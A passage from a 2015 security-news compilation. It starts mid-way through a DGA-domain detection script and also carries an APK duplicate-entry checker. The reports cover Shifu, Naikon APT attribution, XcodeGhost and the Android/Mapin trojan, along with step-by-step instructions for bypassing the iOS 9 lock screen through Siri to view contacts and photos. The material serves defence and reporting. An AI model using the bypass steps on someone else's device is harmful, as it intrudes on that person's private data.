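2015-09-24T10:01:12Z 10.0.0.12 A a9f3kd02lmz.net
2015-09-24T10:01:20Z 10.0.0.12 A login.office365.com
"""

VOWELS = set("aeiou")


def shannon_entropy(s):
    """Bits per character of the label's character distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_non_vowel_run(s):
    """Length of the longest stretch without a vowel (digits count as non-vowels)."""
    best = run = 0
    for ch in s:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def dga_score(label):
    """0..4: one point per signal that typically separates generated labels from words."""
    label = label.lower()
    score = 0
    if shannon_entropy(label) >= 3.2:
        score += 1
    if sum(ch in VOWELS for ch in label) / len(label) < 0.25:
        score += 1
    if any(ch.isdigit() for ch in label):
        score += 1
    if longest_non_vowel_run(label) >= 4:
        score += 1
    return score


def registered_label(name):
    """Second label from the right; two-level public suffixes (co.uk) need a suffix list."""
    parts = name.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def flag_dga(log_text, threshold=3):
    """Return the queried names whose registered label scores at or above `threshold`."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        name = fields[3]
        if dga_score(registered_label(name)) >= threshold:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    for name in flag_dga(DNS_LOG):
        print("DGA-like:", name)
```

A single signal is not enough: stackoverflow.com scores a point on entropy alone, which is why the check requires three of the four before it flags a name; tune the threshold against your own resolver logs before alerting on it.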

The malware uses mailslots for one-way interprocess communication, both locally and over a network. It can also store the track information and stolen data in a mailslot and send the data to its control server using a POST request.

Shifu retrieves the path of the currently running executable by calling GetModuleFileName. This call is needed because the malware may not know its own directory or filename. By obtaining this information dynamically, the malware can install the service no matter which executable is called or where it is stored.

The malware uses SHGetValueA to get a value from an open registry key or from a named subkey.

As usual, the unpacked code is injected in the newly remapped memory.

The malware sends the victim’s version info, PC name, GUID, etc. through HTTP POST to the remote server. A code snippet:
This is just the tip of the iceberg. As we dig deeper into this malware and unearth more we will update you.

iOS 9 security flaw lets attackers access device through Siri

A major security flaw has been identified in the latest version of Apple’s mobile operating system, iOS 9.
It was highlighted by an individual known as Jose Rodriguez, who posted a proof-of-concept video on YouTube (which you can view below).
In it he revealed that cybercriminals can exploit a fundamental weakness in iOS 9 that allows them to gain access to a device via Siri.
Mr Rodriguez, whose background and occupation remains unclear, demonstrates as much in the video.
He begins by entering the incorrect passcode, which he repeats three more times (he shows beforehand what the actual passcode is).
On the fifth attempt, however, before he can be locked out, he quickly holds down on the home button after typing in the last digit.
[Image: SiriIMG_3777 (1)]
This brings up Siri and he then asks, in Spanish, what time it is. The voice-activated personal assistant responds to this prompt by bringing up the device’s inbuilt clock.
After tapping on the clock and then pressing the + icon, Mr Rodriguez is presented with search capabilities, from which he can gain entry into iMessages.
Now he can view any of the contacts stored on the smartphone, including profile pictures, numbers and additional information like emails and addresses.
He also shows how an attacker can browse through a user’s photographs by adding a profile.
While access to other parts of the device remains off-limits, this nevertheless offers cybercriminals access to sensitive information, which can be used to their advantage.
Apple has since been notified of the vulnerability. Until another security update to iOS 9 arrives, Mr Rodriguez advises users to disable Siri.
This is an interesting find, as Apple has pitched iOS 9 as one of the most secure operating systems around.
The latest edition comes with enhanced features, including a stronger passcode and a revamped two-factor authentication (2FA) process.

Naikon APT Group backed by the Chinese PLA Unit 78020

According to a new report, the well-known Naikon APT group is actually backed by China’s PLA Unit 78020; a security firm traced it through the online activity of one of its members.
Ge Xing, also known as “GreenSky27,” is the name of the alleged member of People’s Liberation Army Unit 78020, a group of Chinese state-sponsored hackers. The man was identified by a joint investigation conducted by ThreatConnect and Defense Group Inc.; Ge Xing and his colleagues gather intelligence from political and military sources to advance China’s interests in the South China Sea.

“ThreatConnect, in partnership with Defense Group Inc., has attributed the targeted cyber espionage infrastructure activity associated with the ‘Naikon‘ Advanced Persistent Threat (APT) group to a specific unit of the Chinese People’s Liberation Army (PLA),” the security intelligence firm explains. “Our assessment is based on technical analysis of Naikon threat activity and native language research on a PLA officer within Unit 78020.”

The publication of the investigation’s findings coincides with the official visit of Chinese President Xi Jinping to the US, during which he has firmly denied any involvement of the Chinese Government in the cyber espionage campaigns recently uncovered by security firms.


The control over the South China Sea is strategic for the Chinese Government due to the intense commercial activity in the area.

“The South China Sea is seen as a key geopolitical area for China,” explained Dan Alderman, deputy director of DGI. “With Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.”

A report published by ThreatConnect and Defense Group Inc. links PLA Unit 78020 to the Naikon APT group, one of Asia’s largest APT groups, which has been active for several years. Naikon’s missions targeted entities in various industries, including governments and the military; the hacking crew targeted diplomats, law enforcement, and aviation authorities in many Asian countries such as the Philippines, Malaysia, Cambodia, and Indonesia. Naikon is the group that was involved in a cyber espionage campaign shortly after Malaysia Airlines Flight MH370 disappeared. Recently the group engaged in a hacking dispute with another APT dubbed Hellsing.

In May, Kaspersky Lab published a detailed report on the Naikon APT group and its cyber espionage operations. According to the experts the group uses advanced hacking tools.

The Naikon APT group carried out surgical spear phishing attacks against its targets; the hackers relied on Word or Office documents to trigger a buffer overflow in the ActiveX controls of the MSCOMCTL.OCX Windows library (CVE-2012-0158).

The exploit allows attackers to infect victims with a RAT and establish a backdoor on the victim’s system.

Ge is described not merely as a soldier but as an academic. By analyzing his online activity, the researchers discovered that his location is the headquarters of the PLA technical reconnaissance bureau.

[Image: Naikon APT PLA 3]

“Doing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group’s activity,” said Rich Barger, CIO and cofounder of ThreatConnect. “We’ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.”

The report also detailed a series of operational security mistakes made by Ge, such as embedding certain names in families of malware attributed to the Naikon APT group. The Naikon group and the elite PLA unit appear very close.

“If you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,” Barger said. “You don’t influence what they’re influencing in the region if you don’t have the intel support capabilities fueling that operational machine.”

[Image: Naikon APT PLA 2]

The key findings of the investigation are reported below.

Analysis of historic command and control (C&C) infrastructure used consistently within Naikon malware for espionage operations against Southeast Asian targets has revealed a strong nexus to the city of Kunming, capital of Yunnan Province in southwestern China.
The C&C domain “greensky27.vicp[.]net” consistently appeared within unique Naikon malware, where the moniker “greensky27” is the personification of the entity who owns and operates the malicious domain.
Further research shows many social media accounts with the “greensky27” username are maintained by a People’s Republic of China (PRC) national named Ge Xing (葛星), who is physically located in Kunming.


Cisco Patches Denial-of-Service, Bypass Vulnerabilities in IOS

Cisco pushed out on Wednesday its usual semiannual round of patches for IOS, the software the company uses for most of its routers and switches.

This month’s security advisories addressed four vulnerabilities, three of which could lead to denial of service situations, and another that could have let an attacker bypass user authentication.

The bypass vulnerability stemmed from an improper implementation of the SSH version 2 protocol on IOS and IOS XE software. If exploited, an attacker – assuming they knew a legitimate username configured for RSA-based user authentication, and the public key for the user – could log in with the privileges of that user. Cisco stresses that this is merely a bypass vulnerability in IOS, not a situation where the attacker would be able to escalate privileges.

Since the bug only affects RSA user authentication, end users could disable that functionality to mitigate it, or simply apply the patch.

The denial of service vulnerabilities largely stem from issues in how IPv4 and IPv6 are handled by the software.

One is the result of improper processing of IPv4 packets that require Network Address Translation (NAT) and Multiprotocol Label Switching (MPLS) processing – if an unauthenticated, remote attacker sent the right IPv4 packet they could cause a device reload. Another two are in the IPv6 snooping security feature in IOS and IOS XE – if attackers sent a malformed packet, or a flood of traffic, they could also cause a device to reload.

The patches are the first for the software in six months, as Cisco patches IOS in bundles, twice a year, in March and September.

Last month the company warned its enterprise customers that attackers were attempting to exploit IOS devices. The hackers weren’t exploiting any specific vulnerability; they were apparently using valid credentials, uploading malicious ROMMON images, and gaining persistent access to the devices.

Naikon APT Group Tied to China’s PLA Unit 78020

Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?

Ge Xing is the subject of a joint report published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. Ge is alleged to be a member of the People’s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China’s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.

The report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).

Control over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries’ military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.

“The South China Sea is seen as a key geopolitical area for China,” said Dan Alderman, deputy director of DGI. “With Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.”

The report is just the latest chess piece hovering over Jinping’s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.

According to a New York Times report last week, a letter sent to American technology companies this summer said that China would ask American firms to store Chinese user data in China. China also reportedly asked that U.S.-built software and devices sold in China be “secure and controllable,” which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.

Jinping, meanwhile, tried to distance himself from the fray when he said in a Wall Street Journal interview: “Cyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.”

Journal reporter Josh Chin connected with Ge Xing over the phone and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group, was quickly shut down and taken offline.

In May, researchers at Kaspersky Lab published a report on Naikon and documented five years of activity attributed to the APT group. It describes a high volume of geo-politically motivated attacks with a high rate of success infiltrating influential organizations in the region. The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.

Like most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or Office document carrying an exploit for CVE-2012-0158, a favorite target for APT groups. The vulnerability is a buffer overflow in the ActiveX controls of a Windows library, MSCOMCTL.OCX. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.

Chin’s article describes a similar attack initiated by Ge, who is portrayed not only as a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit’s technical reconnaissance bureau.

“Doing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group’s activity,” said Rich Barger, CIO and cofounder of ThreatConnect. “We’ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.”

The report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group’s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.

“If you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,” Barger said. “You don’t influence what they’re influencing in the region if you don’t have the intel support capabilities fueling that operational machine.”

They Scare People with Invoices, Then Rob the Gullible

24.9.2015 Fraud
Cybercriminals have dusted off an old trick in which they try to smuggle a malicious virus onto someone else’s computer under the pretext of an unpaid invoice. The National Security Team CSIRT, operated by the CZ.NIC association, has warned of fraudulent emails that can easily make several hundred thousand crowns disappear from the accounts of the gullible.
“Here is the invoice that was supposed to be issued without VAT. I would like to agree with you on whether I can simply cancel the invoice and issue a new one, or whether a credit note needs to be issued,” the fraudsters claim in the unsolicited email.

The fraudsters are counting on users having no idea what invoice is being referred to. Out of fear of possible trouble, they then click on the attached file. Besides the fictitious document, however, the attachment also hides a computer virus.

“An email from a known or unknown contact contains a dangerous attachment named faktura.doc, 236K in size. This attachment contains a VBScript for downloading malware,” said Pavel Bašta, security analyst with the CSIRT team.

People should therefore never click on the attachment.

People have already lost hundreds of thousands
A thirty-five-year-old woman from the Šumperk region learned first-hand how dangerous such messages can be. In March this year, a still unknown perpetrator sent a form to her email inbox asking her to synchronise her account with her mobile phone.

“She followed the attached instructions and synchronised her phone and her personal computer. In this way the fraudster gained access to her bank account and then, in two bank transfers, relieved the woman of almost 400 thousand crowns,” said police spokesman Josef Bednařík.

Such attacks are by no means exceptional. A businessman from the Náchod region also lost several hundred thousand crowns this year because of a similar email.

As Holey as Emmental. Adobe Has to Fix Dozens of Security Flaws in Flash Player

24.9.2015 Vulnerabilities
Adobe has released an update that fixes more than two dozen flaws in Flash Player. Attackers can abuse the holes in the application, which tens of millions of people around the world use to play videos on the internet, to take control of someone else’s computer. The Hacker News site pointed this out.
“Adobe has released 23 security patches for Flash Player. The security patches fix critical flaws that could potentially allow an attacker to take control of the affected system,” warned Pavel Bašta, analyst with the National Security Team CSIRT.CZ, which is operated by the CZ.NIC association.

The flaws affect users who run Flash Player on Windows, Linux and Apple’s Mac OS X operating systems.

Through the discovered holes, computer pirates can smuggle practically any malicious code into the affected operating system. They can thus spy on users, get at data stored on the disk, or simply take over the entire system remotely.

People should therefore not delay installing the update. It can be downloaded either through automatic updates or directly from Adobe’s website.

Apple's Biggest Hack Ever: 4000 Malicious iOS Store Apps Linked to CIA?

The first major cyber attack on Apple's App Store has now been linked to the CIA (Central Intelligence Agency).
Last week, researchers disclosed some 39 iOS apps on Apple's App Store infected by the 'XcodeGhost' malware. The bad news is that the infection has now increased exponentially with the discovery of more than 4,000 infected apps.
The XcodeGhost malware was distributed through legitimate iOS apps built with counterfeit versions of Apple's app developer toolkit, Xcode.
XcodeGhost is a very harmful and dangerous piece of malware that is capable of phishing credentials, infecting other apps, hijacking URLs and stealing iCloud passwords from your device, then uploading them to the attacker's servers without your knowledge.
After Apple had removed nearly 300 malware-ridden iOS apps from the App Store, FireEye researchers found more than 4,000 compromised apps.
The infected apps include the popular instant messaging app WeChat, the Chinese Uber-like cab service Didi Kuaidi, the photo editor Perfect365, the music streaming service NetEase, and the card scanning tool CamCard, all of which were built with the malicious Xcode.
But Where Does the CIA Come into Picture?
The technique used by XcodeGhost is similar to one developed by Central Intelligence Agency (CIA) researchers and reported by The Intercept in March this year, citing documents leaked by Edward Snowden.
The leaked documents claimed that the CIA detailed a way to manipulate Xcode in order to add backdoors into iOS apps without the knowledge of the developers.
iOS apps built using the modified version of Xcode could enable spies to steal passwords and grab messages from infected devices, as well as send that data to a command center of their choice.
The documents didn't make it clear how the CIA and other intelligence agencies would "get developers to use the poisoned version of Xcode."
But now, perhaps, we know how.
The answer could be XcodeGhost, which has capabilities very similar to those of the CIA approach, and the way it infects iOS apps also matches the method the CIA documents describe.
Apple has assured its customers that the company is working to remove these infected apps from its App Store, but it has not yet responded to questions about whether Apple was aware of the CIA techniques for compromising Xcode.

Firefox 41 integrates Free Built-in Instant Messaging and Video Chat to Your Browser

Mozilla launches voice and video calling with the official Firefox 41.0 release.
After significant improvements made in the Firefox Nightly experimental build of Firefox 41.0, the stable release has a lot to offer.
What would it be like to have seamless communication – video and voice calls and text messaging – built directly into your browser?
Here's how:
Mozilla has launched the stable release of Firefox 41.0, equipped with the "Firefox Hello" project, which offers free VoIP and instant messaging services over a WebRTC (Web Real-Time Communication) channel.
Firefox Hello had already arrived last year via the Firefox 41.0 Beta release, with the aim of improving users' experience by providing them with free voice and video calling, irrespective of any additional software or hardware support.
By adopting Firefox Hello:
Both parties don't need to have the same browser, software or hardware.
No sign-up other than a logged-in Firefox account is required for the communication.
Instant messages can be sent and received while a video call is running in Firefox for Windows, Mac and Linux.
Screen sharing can be enabled by the persons in communication.
Contacts integration can be enabled if both parties use different browsers.
This stable release has not been released for desktop versions alone; it supports the Android operating system as well.
WebRTC is a technology that enables browser-based real-time communications without transmission delays. It comes with features like:
Allowing the smooth flow of communication without downloading any additional plugins.
Using robust encryption methods.
Saving costs.
The services included in Firefox Hello are available when your system runs a browser (Firefox, Chrome, Safari, Edge or Opera) updated with WebRTC support.
Along with Firefox Hello, many other notable updates and features come with Firefox 41.0, such as setting a profile picture for your Firefox account and fixes for security issues, to name a few.
Browser-based security issues cannot be neglected at the same time. As with the launch of any new technology, people with malicious intent will always look at the picture from the other side, seeking a way to break in.

Google Drive security boost for paying customers

Organizations that pay to use Google Drive will benefit from a raft of new security features, it has been announced.
The tech giant said that this is part of its “ongoing commitment” to provide enterprises with productive and safe work-related solutions.
And with more organizations signing up to Google for Work – one million paying customers as of this year – the company is under even greater pressure to deliver a secure and effective product.
In an official blog post, Scott Johnston, director of product management for Google Drive, said that these developments will make Google Drive “the safest place for all of your work”.
He highlighted three areas that have undergone a significant revamp: a new standard for privacy has been introduced; eDiscovery capabilities have been transformed; and mobile device management features have been updated.
The latter is in recognition of the fact that the nature of work has changed significantly over the last few years, with more organizations advocating the use of mobile devices like smartphones and tablets.
Employers are also now able to encrypt devices, scrutinize usage and enforce strong passwords, the expert stated. They will also be able to wipe all data in the event of a device being stolen or lost.
As for privacy, Google has added the new ISO/IEC 27018:2014 privacy standard to its compliance framework.
Mr Johnston explained: “This audit validates our privacy practices and contractual commitments to our customers, verifying for example that we don’t use your data for advertising, that the data that you entrust with us remains yours and that we provide you with tools to delete and export your data.”

Criminals, Linguistics, Literacy and Attribution

In an article I wrote recently for Infosecurity Magazine – Spelling Bee (Input from the Hive Mind) – I touched on the topic of textual analysis (in a rather loose sense).
This was in response to some comments implying that it’s a good indicator of scamminess when a message uses US or UK spellings inappropriate to the region from which it’s supposed to originate. The main thrust of that part of my article was that the use of the -ize or -ise suffixes is not as cut and dried as some spelling and style checkers would have you believe, and that the use of Americanisms is not an infallible guide to origin in the 21st century. However much some of us might regret their encroachment into UK English…
In fact, the pseudo-French replacement of all instances of –ize with –ise is a fairly recent publishing fad with which many writers and publishers in the UK have never chosen to conform. And, of course, with the globalization of many commercial entities, it’s not uncommon for many people in many countries whose first language is not English to learn the language from US-oriented sources, and that may also influence a company’s regional preference, linguistically speaking.
A Spelling Bee searching for its dictionary
Indeed, while poor English (of whatever regional variety) is often a clue that Something Is Phishy, even august financial institutions might sometimes slip up, or use unexpected regional idioms.
One point I made, however, was that ‘impeccable presentation doesn’t prove legitimacy‘ and that other cues and clues may be more reliable.
While the recent report in The Register of two men arrested in connection with the CoinVault ransomware doesn’t provide any information related to phish-type social engineering and linguistic manipulation, it’s interesting to see that part of the case against these suspects seems to be based on the inclusion of phrases in ‘perfect Dutch’ sprinkled throughout the binary, indicating a Dutch connection.
I don’t have any privileged information about the case, and no reason at all to believe that the Dutch NHTCU’s conclusions aren’t justified. It is worth bearing in mind, though, that in general anti-malware analysts are careful to avoid drawing ‘authoritative’ forensic conclusions: in particular about attribution of the origin of malicious activity on the basis of linguistics, cultural references, timestamps and other attributes that might provide useful clues, but might also be deliberately introduced to mislead analysts for political or other reasons. Irritating as that caution may sometimes be to journalists and others, there are often good reasons for it.

7 years of Android: A painful journey to world dominance

Exactly seven years ago to the day (September 23rd), Google, after much speculation, finally lifted the lid on its secret project, one which would go on to change the mobile world. Despite the rumors, it wasn’t a brand new smartphone – it was so much more. What it brought to the table was a completely new operating system, which would, in just a few years, become the most dominant force in the mobile and smartphone market. Its name? Android.
However, it has to be said that all that success didn’t happen without some notable security glitches and slips along the way, and a few of the most notable ones have been quite recent, in fact. To begin then, let’s go back to the summer of 2013 when a gaping security hole, known as the Android Master Key exploit, was revealed.
Affecting practically all devices running the operating system, Android Master Key allowed attackers to modify installation packages (Android Application Packages, APKs) without the device being able to detect the changes. The risk? Legitimate apps could potentially be turned into malicious trojans.
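The Master Key bug described above was triggered by APKs that carried two ZIP entries with the same name: the signature verifier checked one copy while the installer unpacked the other. Legitimate build tools never emit duplicate entry names, so flagging them is a cheap static check for this whole class of tampering. The following script is an added example, not code from the article or from Google; the sample APK it builds is constructed in-line for the demonstration.

```python
"""Flag APK/ZIP files whose central directory contains duplicate entry names.

Added example (not from the article). Android's "Master Key" bug (2013)
was exploited with APKs containing two entries of the same name, so that the
signature verifier and the installer read different copies. A ZIP with
duplicate names is never produced by normal build tooling, which makes the
check below a useful triage step independent of the device's own verifier.
"""
import io
import warnings
import zipfile
from collections import Counter


def duplicate_entries(apk_bytes: bytes) -> dict:
    """Return {entry_name: count} for every name that appears more than once.

    infolist() exposes every central-directory record, including duplicates;
    namelist()/getinfo() would silently keep only the last record per name.
    """
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        counts = Counter(info.filename for info in zf.infolist())
    return {name: n for name, n in counts.items() if n > 1}


def is_suspicious(apk_bytes: bytes) -> bool:
    """True when the archive shows the duplicate-entry tell."""
    return bool(duplicate_entries(apk_bytes))


def build_sample_apk(tampered: bool) -> bytes:
    """Construct a minimal stand-in for an APK (constructed sample data).

    With tampered=True a second 'classes.dex' record is appended, mirroring
    the layout that defeated the original verifier.
    """
    buf = io.BytesIO()
    with warnings.catch_warnings():
        # zipfile warns about duplicate names but still writes the record.
        warnings.simplefilter("ignore")
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("AndroidManifest.xml", "<manifest/>")
            zf.writestr("classes.dex", b"dex\n035\x00 original code")
            if tampered:
                zf.writestr("classes.dex", b"dex\n035\x00 replacement code")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("clean", build_sample_apk(False)),
                        ("tampered", build_sample_apk(True))):
        print(label, "->", duplicate_entries(blob) or "no duplicate entries")
```

Run it against a real file with `duplicate_entries(open(path, "rb").read())`; anything other than an empty dict deserves a closer look, regardless of whether the signature still verifies.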
Another giant slip came to light just a few months ago, in July 2015. Known as Stagefright, this bug could threaten as much as 95 percent of all Android devices on the planet – meaning almost a billion devices in real numbers. Only one MMS sent by a cybercriminal could result in you losing control over your device – even if you didn’t read or open it.
As an open-source based system – and one of the most popular – Android also made headlines thanks to the rise of many malware threats. Recently, a lock-screen-type ransomware was reported to be making its rounds across the US. Detected as Android/Lockerpin.A, the fraudsters behind this attack have been demanding $500 for unlocking a victim’s device.
Another example is extremely recent, with ESET researchers reporting a new threat just yesterday (September 22nd). Dubbed Android/Mapin, this stealth attack, which is directed towards Android users, exploits popular arcade games such as Plants vs Zombies, Candy Crush or Super Hero Adventure by delivering a backdoor trojan directly onto a user’s smartphone or tablet.
With help of this malicious code, an attacker can take control of the device and make it part of a botnet. In the example discovered by ESET, it was observed that the trojan was also using a timer, allowing it to delay the execution of a malicious payload. This meant it was able to stay under the radar and, consequently, any odd behavior that the device was demonstrating was put down to the game.
What is alarming about Android/Mapin is the fact that all of this was found to be possible using downloadable apps from the official Google Play store. According to ESET telemetry, most of the infections were detected in India, currently constituting over 73 percent of all detections.
As Android’s short but remarkable existence clearly documents, the most widely used OS still has its weaknesses and remains a clear target for cybercriminals. That’s the problem with popular operating systems and devices – they attract the attention of attackers just as much as they do intrepid developers and users. So, if you want to celebrate seven years of the platform, follow these eight simple rules which will help you stay safe:
Always update your device’s operating system and apps to the latest available version
Back up all (or at least the most valuable) data on your device
Use up-to-date security solutions by a reputable vendor
Stick to the official Google Play store, where the likelihood of malware infection is the lowest (even though, as Android/Mapin proves, it is not perfect, apps there are still checked by Google itself and sometimes analyzed by security vendors)
If however you are required to use third party apps, only do so if the source is trustworthy (e.g. your employer)
Use a screen lock and remember that a pattern is less secure than a PIN, and a password is your best choice
Encrypt the contents of your device
Try to avoid rooting the device, no matter how tempting this option might be.

Global information security spend grows by 5% in 2015

Total global spend on information security will have increased by 4.7 percent by the end of 2015, taking the figure to $75.4 billion.
This is according to new analysis from Gartner, which stated that the boost in spending can be attributed to a number of factors including increased legislation, more government initiatives and as a result of high-profile data breaches.
All of the above underscores the seriousness of cybercrime, be it from the point of view of an individual, organization or government.
“Interest in security technologies is increasingly driven by elements of digital business, particularly cloud, mobile computing and now also the Internet of Things, as well as by the sophisticated and high-impact nature of advanced targeted attacks,” commented Elizabeth Kim, a research analyst at Gartner.
Gartner’s forecast for information security spend comes on the back of a new study from Grant Thornton International Ltd, which noted that cyberattacks are “taking a serious toll” on businesses across the globe.
The Grant Thornton International Business Report found that the total cost of cybercrime internationally for the last 12 months was $315 billion (approximately £200 billion).
Manu Sharma, head of cyber security and resilience at Grant Thornton UK LLP, said that such attacks represent a “significant danger” to all businesses.
“Not just the costs in terms of financial penalties, but serious reputational damage and loss of customers and business can be inflicted if attacks undermine customer confidence,” he elaborated.
“Despite this, some firms still lack a strategy to deal with cyberthreat or even understand the risks to their organization.”
The expert went on to say that enterprises need to stay ahead of the curve of cybercrime if they are to continue to thrive and remain secure from such threats.
“Cyber attacks can strike without warning and sometimes without the victim being immediately aware,” he added, concluding that in the digital age, preeminent levels of security and privacy are demanded by customers at all times.

90% of large businesses in the UK experienced data breach

The UK government has called on all businesses in the country to protect themselves from the growing threat of cybercrime.
Ed Vaizey, minister for culture and the digital economy, said that while many enterprises are “reaping the benefits” of being online, no organization is immune to the menace of cyberattacks.
As an example, he stated that in 2014 alone, 74 percent of small businesses and 90 percent of major businesses had experienced a data security breach.
Mr Vaizey, who was speaking at the Financial Times Cyber Security Summit Europe 2015, explained that the government itself is also making a concerted effort to protect the UK from cybercrime.
For example, he announced at the event that a new £500,000 fund has been set up specifically for colleges and universities to enhance the nation’s cyber prowess.
This will, he said, help them develop innovative teaching methods and more engaging learning environments that will, in turn, produce the cybersecurity skills needed to protect everyone in the UK today and in the future.
“Good cybersecurity underpins the entire digital economy – we need it to keep our businesses, citizens and public services safe,” commented Mr Vaizey.
“The UK is a world leader in the use of digital technologies but we also need to be a world leader in cybersecurity.
“Trust and confidence in UK online security is crucial for consumers, businesses and investors. We want to make the UK the safest place in the world to do business online.”
The UK government’s announcement comes on the back of new data that suggests businesses in the country are more at risk of a cyberattack than their international counterparts.
ThreatMetrix found that British enterprises have been attacked more than double the number of times as those in the US. Financial institutions were reported as being the number one target.
Worryingly, the UK is now also the “second highest originator” of cybercrime in the world. The US remains number one.

Android trojan drops in, despite Google Bouncer
24.9.2015 Mobile

Recently at ESET we came across an interesting stealth attack on Android users: an application that is a regular game, but with one interesting addition. The application was bundled with another application named systemdata or resourcea, and that is certainly a little suspicious. Why would a regular game downloaded from the official Google Play store come with another application named systemdata? This particular application/game from the Google Play Store is definitely not a system application, as the name seems intended to suggest.
The bundled application is dropped silently onto the device, but it must ask the user to actually install it. The application requesting installation masquerades as an app for "managing settings". Once installed, the application runs in the background as a service.
ESET detects the games that install the trojan as Android/TrojanDropper.Mapin and the trojan itself as Android/Mapin. According to our telemetry, Android users in India are currently the most affected, with 73.58 percent of observed detections.
It is a backdoor trojan that takes control of your device and makes it part of a botnet under the attacker's control. The trojan sets timers that delay the execution of the malicious payload. This is to make it less obvious that the trojanized game is responsible for the suspicious behavior. In some variants of this infiltration, at least three days must elapse before the malware reaches full trojan functionality. It is probably this delay that allowed the TrojanDownloader to get past Google's Bouncer malware prevention system.
After that, the trojan requests device administrator rights and starts communicating with a remote C&C server. Android/Mapin contains several functions, such as pushing various notifications, downloading, installing and launching applications, and obtaining the user's private information, but its main purpose seems to be displaying fullscreen advertisements on the infected device.
Distribution vectors: Google Play & Co.
The most interesting thing about this Android trojan is that it was available for download from the official Google Play Store in late 2013 and 2014 as Hill Climb Racing the game, Plants vs Zombies 2, Subway Suffers, Traffic Racer, Temple Run 2 Zombies and Super Hero Adventure, from the developers TopGame24h, TopGameHit and SHSH. The malware was uploaded to Google Play on November 24–30, 2013 and November 22, 2014.
According to MIXRANK, Plants vs Zombies 2 had more than 10,000 downloads before it was pulled. On the same date, System Optimizer, Zombie Tsunami, Tom Cat Talk, Super Hero Adventure, Classic Brick Game and the applications from the Google Play Store mentioned earlier, bundled with the same backdoor, were uploaded to several alternative Android markets by the same developers.
The same backdoor was also found bundled with other applications uploaded by the developer PRStudio (not prStudio) to alternative Android markets, some of which link to the official Google Play Store. This developer uploaded at least five other trojanized applications – Candy Crush or Jewel Crush, Racing Rivals, Super Maria Journey, Zombie Highway Killer and Plants vs Zombies – to various third-party Android markets. All of these infected games are still available for download from those markets. The infected applications have been downloaded thousands of times.
Figure 1: Infected applications

Figure 2: The application receives positive feedback
Infection: victims are prompted to install the malware 24 hours after execution
There are variations in the way this malware is dropped. The trojan is dropped and the victim is asked to install it 24 hours after the first launch of the downloaded application. This method seems less suspicious to the user and makes them believe that the request to install the application comes from the operating system. Other trojan versions do not wait 24 hours but start immediately. All variants are launched after a connectivity change, since a broadcast receiver is registered in the manifest.

Figure 3: Connectivity change receiver
On a connectivity change, the user is prompted to install a "system application". The dropped malware pretends to be Google Play Update or Manage Settings.

Figure 4: Trojan installation request
If the user chooses to cancel and not install, then he or she will be prompted to install again at every connectivity change. The average user will be convinced that it is some important update and at some point is likely to install it just to get rid of the notification. After that, the trojan launches a service with its own registered broadcast receiver, waiting for the next connectivity change.
When connectivity changes, the malware tries to register with the Google Cloud Messaging (GCM) servers so that it can receive messages. After GCM registration, Android/Mapin registers the infected device with its own server, sending the user name, Google account, IMEI, registration ID and its own package name.

Figure 5: Registering the device with the attacker's server
To protect itself from being uninstalled, the trojan asks the user to activate "device administrator":

Figure 6: Device administrator
